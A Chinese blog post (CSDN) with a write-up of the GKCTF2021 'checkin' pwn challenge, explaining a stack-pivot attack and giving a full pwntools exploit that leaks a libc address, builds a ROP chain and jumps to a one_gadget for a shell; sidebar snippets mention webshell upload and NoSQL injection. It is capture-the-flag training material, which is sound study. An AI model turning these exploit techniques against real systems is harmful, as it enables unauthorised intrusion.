GKCTF2021_checkin

最新推荐文章于 2022-07-13 10:49:03 发布
最新推荐文章于 2022-07-13 10:49:03 发布
阅读量413 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124062952
版权

GKCTF2021_checkin

查看保护
在这里插入图片描述
简单题

在这里插入图片描述
有一个溢出,只能溢出到rbp所以肯定栈迁移直接打。有一个小坑点就是0x20这个read,最后一个gadget不能选用puts_plt + main_addr,因为0x20不够,所以选择下面这个gadget即可,可以泄露libc又可以继续执行vuln函数
在这里插入图片描述

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28952)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
pop_rdi_ret = 0x0000000000401ab3
puts_addr = 0x4018B5

p1 = b'admin\x00\x00\x00'
p1 += p64(pop_rdi_ret) + p64(puts_got) + p64(puts_addr)
r.recvuntil('>')
r.send(p1)

bss_addr = 0x602400
p2 = b'admin\x00\x00\x00'
p2 += p64(0) * 3 + p64(bss_addr)
r.recvuntil('>')
r.send(p2)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
li('[+] puts_addr = ' + hex(puts_addr))
libc = ELF('./libc.so.6')

libc_base = puts_addr - libc.sym['puts']
one = [0x45226, 0x4527a, 0xf03a4, 0xf1247]
one_gadget = one[2] + libc_base

p3 = b'admin\x00\x00\x00' * 3
p3 += p64(one_gadget)
r.recvuntil('>')
r.send(p3)

p4 = b'admin\x00\x00\x00' * 4
p4 += p64(bss_addr)
r.recvuntil('>')
r.send(p4)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
glados_checkin
03-25
glados定时签到
daily_checkin.zip
01-07
【标题】"daily_checkin.zip" 是一个包含脚本的压缩包,用于自动完成天翼云的每日签到任务,并且据描述在2022年1月7日时已经经过了测试,证明是可用的。这个压缩包可能对那些需要定期在天翼云平台签到并领取额外存储...
GKCTF2021 checkin
pondzhang的专栏
06-27 505
from pwn import * context.log_level='debug' p = process('./login') elf = ELF('./login') libc = elf.libc puts_func = 0x00000000004018B5 puts_got = 0x0000000000602028 pop_rdi_ret = 0x0000000000401ab3 main = 0x0000000000401A2A bss = 0x0000000000602400 p.recv.
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1377
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
GKCTF2020 checkin
qq_53755216的博客
06-23 312
写在前面 最近快期末考了 拼搏20天 我要上大二 每天晚上会找时间刷一下CTF 正片开始 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $thi
Buuctf [GKCTF2020]CheckIN
CyhDl666的博客
03-19 322
进入网站直接贴了源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin.
HRMS_Employee_checkIn_checkOut
02-09
本系统“HRMS_Employee_checkIn_checkOut”主要关注员工的签到签退功能,其核心技术是利用JavaScript进行前端开发,实现了用户友好的交互界面和实时的数据处理。 JavaScript是一种广泛应用于网页和网络应用的脚本...
tongji_checkin
03-04
【同济大学健康打卡自动脚本--GitAction版】是一个基于Python编程语言的自动化工具,专为同济大学的学生或教职工设计,旨在简化每日的健康打卡流程。此脚本利用了GitAction,一个GitHub的动作(Actions)服务,使得...
ZJBTI_COVID-19_Checkin
03-09
浙工商“疫情自动签到”介绍使用GitHub动作自动化执行浙江工商职业技术学院疫情签到。触发方式点亮星凌晨1点定时执行自定义:.github / workflows / main.yaml编辑注意:如果身体状况异常,请立即上报本项目不承担...
【GKCTF 2021】Random
MangoFengC++
05-26 667
Random 题目 import random from hashlib import md5 def get_mask(): file = open("random.txt","w") for i in range(104): file.write(str(random.getrandbits(32))+"\n") file.write(str(random.getrandbits(64))+"\n") file.write(str(ran
2021GKCTF-hackme
unexpectedthing的博客
07-13 710
GKCTF-hackme
[GKCTF2020]CheckIN -wp
freerats的博客
06-06 1200
向Ginkgo传参,后面还有eval函数,先传个phpinfo(); 试试,要传base64编码后的。 发现没有问题,发现一大堆被禁的函数,php版本为7.3。 接下来看看能不能穿一句话上去 eval($_POST[‘ccc’]); ?Ginkgo=ZXZhbCgkX1BPU1RbJ2NjYyddKTs= 然后用蚁剑连接 可以看到flag和readflag; 权限不够无法打开flag,readflag打开也是一堆乱码。 这种情况一般就是通过执行readflag来获取flag。 接下来就要结合7.3版本,r
gkctf2021hackme
weixin_44805159的博客
10-10 515
title: gkctf2021hackme typora-copy-images-to: gkctf2021hackme date: 2021-10-10 00:02:59 tags: [渗透测试, ctf, weblogic, 内网穿透] 进入题目,出现的是一个登录框:查看源码后提 示:怀疑是Nosql注入,尝试登录,查看数据包是json传输:burp抓包,构造永真式登录: {"username":{"$ne":1},"password": {"$ne":1}} 发现被检测了,根据提示一:使用uni.
[GKCTF 2021]CheckBot
cjdgg的博客
11-25 2854
[GKCTF 2021]CheckBot <html> <body> <iframe id="flag" src="http://127.0.0.1/admin.php"></iframe> <script> window.onload = function(){ /*
re学习笔记(64)GKCTF2020-re-Check_1n|BabyDriver
逆向随笔
05-24 1652
Check_1n 第一题运行程序,提示输入开机密码 输入错误会提示密码错误,去IDA搜索字符串得到密码HelloWord 然后开机后运行 打砖块 程序即可得到flag 切换程序的时候用箭头上下左右,回车启动, BabyDriver 搜索字符串发现有一串类似迷宫的字符串 迷宫字符串长度是225,刚开始以为是1515的,分析了下代码发现是1614的,, 可以写程序画出迷宫来,然后就是按键的问题了,,,因为是sys文件,所以按键应该是键盘扫描码而不是ASCII码 在线键盘扫描码查询 下移是0x25也就是K
[GKCTF 2021]RRRRsa
qq_52193383的博客
09-15 1436
昨天+今天都在了解和学习Rho算法以及题目羊城杯2021的easy_rsa。Rho算法算是看懂了点,可是用起来好像时间花销好大还解不出来(不知道是不是数据的问题,我用的模数是网站上无法分解的)。最最最最痛苦的是easy_rsa魔改rho后却能很快得分解出p,q,可我用Rho算法求解却解不出来(自己编的,代码附上),而且我还不知道为什么它这么一改就可以算出来。 def f(x,c,n): return (pow(x,2,n) + c)%n def Rho(n): while True:
GKCTF2021部分wp
Dream的博客
06-28 931
Misc 签到 过滤http流量,找到cat /f4g的流量,再追踪http流,可以发现末尾有一串16进制数: 拿到这串十六进制数去解码,在base64解码得到: 我们可以看到这串“==QIhM0QDN0Q”的顺序反了,由此猜测我们要把这串编码全部反着来: a="wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD" b="jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDj
GKCTF2020笔记
克格莫
06-03 285
Crypto CTF还是要多做,不然就会吃没见识的亏 1.小学生的密码学 e(x)=11x+6(mod26) 密文:welcylk(flag为base64形式) 这题是典型的仿射密码。 上代码: 然后得到flag{c29yY2VyeQ==}
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值